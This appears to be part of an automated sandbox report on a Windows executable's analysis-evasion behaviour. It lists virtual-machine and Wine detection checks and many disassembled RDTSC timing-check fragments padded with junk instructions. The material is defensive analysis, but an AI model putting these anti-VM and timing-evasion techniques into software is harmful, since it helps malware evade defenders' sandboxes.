    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSystem information queried: FirmwareTableInformation
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: CF6686 second address: CF5EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F0BACBDA1A3h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 ja 00007F0BACBDA19Ch 0x0000001b sbb ecx, 17BF47C9h 0x00000021 popad 0x00000022 push dword ptr [ebp+122D0579h] 0x00000028 sub dword ptr [ebp+122D1CCEh], esi 0x0000002e call dword ptr [ebp+122D31A9h] 0x00000034 pushad 0x00000035 sub dword ptr [ebp+122D1E1Bh], ebx 0x0000003b or dword ptr [ebp+122D1E1Bh], ecx 0x00000041 xor eax, eax 0x00000043 jnl 00007F0BACBDA1A9h 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d cld 0x0000004e mov dword ptr [ebp+122D2DEBh], eax 0x00000054 cld 0x00000055 mov esi, 0000003Ch 0x0000005a js 00007F0BACBDA1A6h 0x00000060 jmp 00007F0BACBDA1A0h 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 sub dword ptr [ebp+122D1E1Bh], eax 0x0000006f lodsw 0x00000071 jmp 00007F0BACBDA19Ch 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D332Ch], edx 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 pushad 0x00000085 xor dx, FF16h 0x0000008a jnl 00007F0BACBDA1A8h 0x00000090 popad 0x00000091 push eax 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 push esi 0x00000096 pop esi 0x00000097 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EB9 second address: E64EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EBD second address: E64EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EC3 second address: E64EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EC8 second address: E64EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0BACBDA196h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jl 00007F0BACBDA196h 0x00000017 jp 00007F0BACBDA196h 0x0000001d jnc 00007F0BACBDA196h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E64EF0 second address: E64EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E651CB second address: E651D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E65485 second address: E65489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E6791F second address: E67928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67928 second address: CF5EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F0BACBDA3E1h 0x0000000d push dword ptr [ebp+122D0579h] 0x00000013 mov dword ptr [ebp+12441B2Fh], edi 0x00000019 call dword ptr [ebp+122D31A9h] 0x0000001f pushad 0x00000020 sub dword ptr [ebp+122D1E1Bh], ebx 0x00000026 or dword ptr [ebp+122D1E1Bh], ecx 0x0000002c xor eax, eax 0x0000002e jnl 00007F0BACBDA3E9h 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 cld 0x00000039 mov dword ptr [ebp+122D2DEBh], eax 0x0000003f cld 0x00000040 mov esi, 0000003Ch 0x00000045 js 00007F0BACBDA3E6h 0x0000004b jmp 00007F0BACBDA3E0h 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 sub dword ptr [ebp+122D1E1Bh], eax 0x0000005a lodsw 0x0000005c jmp 00007F0BACBDA3DCh 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D332Ch], edx 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f pushad 0x00000070 xor dx, FF16h 0x00000075 jnl 00007F0BACBDA3E8h 0x0000007b call 00007F0BACBDA3E1h 0x00000080 pop ecx 0x00000081 popad 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push esi 0x00000087 pop esi 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67962 second address: E67989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F0BACBDA1AEh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67B6F second address: E67B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C5E second address: E67C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C62 second address: E67C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C68 second address: E67C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C6E second address: E67C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C72 second address: E67C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67C76 second address: E67CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 43BA3CD6h 0x0000000f push edi 0x00000010 call 00007F0BACBDA3E9h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop edx 0x00000019 push 00000003h 0x0000001b movzx edx, si 0x0000001e push 00000000h 0x00000020 jmp 00007F0BACBDA3DCh 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F0BACBDA3D8h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 movsx ecx, di 0x00000044 push AA8B8262h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d pop eax 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E67CE6 second address: E67D51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0BACBDA19Bh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 15747D9Eh 0x00000012 pushad 0x00000013 movzx eax, dx 0x00000016 mov ebx, dword ptr [ebp+122D20C7h] 0x0000001c popad 0x0000001d lea ebx, dword ptr [ebp+1244581Ah] 0x00000023 push ecx 0x00000024 mov edx, dword ptr [ebp+122D334Eh] 0x0000002a pop ecx 0x0000002b jmp 00007F0BACBDA1A7h 0x00000030 xchg eax, ebx 0x00000031 jg 00007F0BACBDA19Ah 0x00000037 push esi 0x00000038 pushad 0x00000039 popad 0x0000003a pop esi 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F0BACBDA1A5h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E889DE second address: E88A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F0BACBDA3E2h 0x0000000b je 00007F0BACBDA3D6h 0x00000011 jp 00007F0BACBDA3D6h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jno 00007F0BACBDA3D6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF67 second address: E5AF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF6F second address: E5AF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF73 second address: E5AF87 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BACBDA196h 0x00000008 jnc 00007F0BACBDA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5AF87 second address: E5AFAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DCh 0x00000007 jmp 00007F0BACBDA3DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jns 00007F0BACBDA3D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86AC2 second address: E86AD3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BACBDA198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86AD3 second address: E86AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86D88 second address: E86D9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push esi 0x0000000f jne 00007F0BACBDA196h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86D9F second address: E86DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA3E7h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E86F5D second address: E86F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E871D7 second address: E871DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E871DC second address: E871F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jl 00007F0BACBDA196h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E871F4 second address: E871FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87554 second address: E8755A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8755A second address: E8756C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F0BACBDA3DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E876AF second address: E876B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87A7E second address: E87A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BE9 second address: E87BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BEE second address: E87BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BF4 second address: E87BFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E87BFA second address: E87C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F0BACBDA3E2h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E88180 second address: E8818B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8818B second address: E88193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E88193 second address: E88198 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E88588 second address: E8858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8B6DE second address: E8B6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F0BACBDA196h 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8A4EB second address: E8A4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8BD83 second address: E8BDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F0BACBDA19Ch 0x0000000b jne 00007F0BACBDA196h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 jmp 00007F0BACBDA19Ch 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push ebx 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8CFCD second address: E8CFD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8CFD4 second address: E8CFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E8CFDA second address: E8D01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0BACBDA3E8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jne 00007F0BACBDA3D6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0BACBDA3E4h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E946D5 second address: E946E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0BACBDA196h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9481C second address: E9482C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F0BACBDA3D6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94955 second address: E9498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 je 00007F0BACBDA1ABh 0x0000000d pushad 0x0000000e js 00007F0BACBDA196h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007F0BACBDA196h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9498E second address: E94999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94999 second address: E9499F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94DDD second address: E94DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94DE3 second address: E94DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA19Ah 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E94DF2 second address: E94E0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F0BACBDA3D6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F0BACBDA3D6h 0x00000017 jp 00007F0BACBDA3D6h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E950CF second address: E950DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E950DA second address: E950E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jns 00007F0BACBDA3DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5FEF5 second address: E5FF11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007F0BACBDA1A2h 0x0000000e pop ecx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5FF11 second address: E5FF17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5FF17 second address: E5FF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99D41 second address: E99D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xor dword ptr [esp], 5816DA72h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F0BACBDA3D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 4AF6A0ACh 0x00000030 pushad 0x00000031 pushad 0x00000032 jmp 00007F0BACBDA3E2h 0x00000037 jg 00007F0BACBDA3D6h 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99D9E second address: E99DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99DA2 second address: E99DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99F00 second address: E99F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99F04 second address: E99F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A0CF second address: E9A0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A1B6 second address: E9A1BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A1BA second address: E9A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0BACBDA19Bh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A538 second address: E9A53D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A9E3 second address: E9A9E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9AA53 second address: E9AA59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9AA59 second address: E9AA99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0BACBDA1A0h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e js 00007F0BACBDA1A4h 0x00000014 push eax 0x00000015 pushad 0x00000016 js 00007F0BACBDA19Ch 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ABCF second address: E9ABD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0BACBDA3D6h 0x0000000a rdtsc
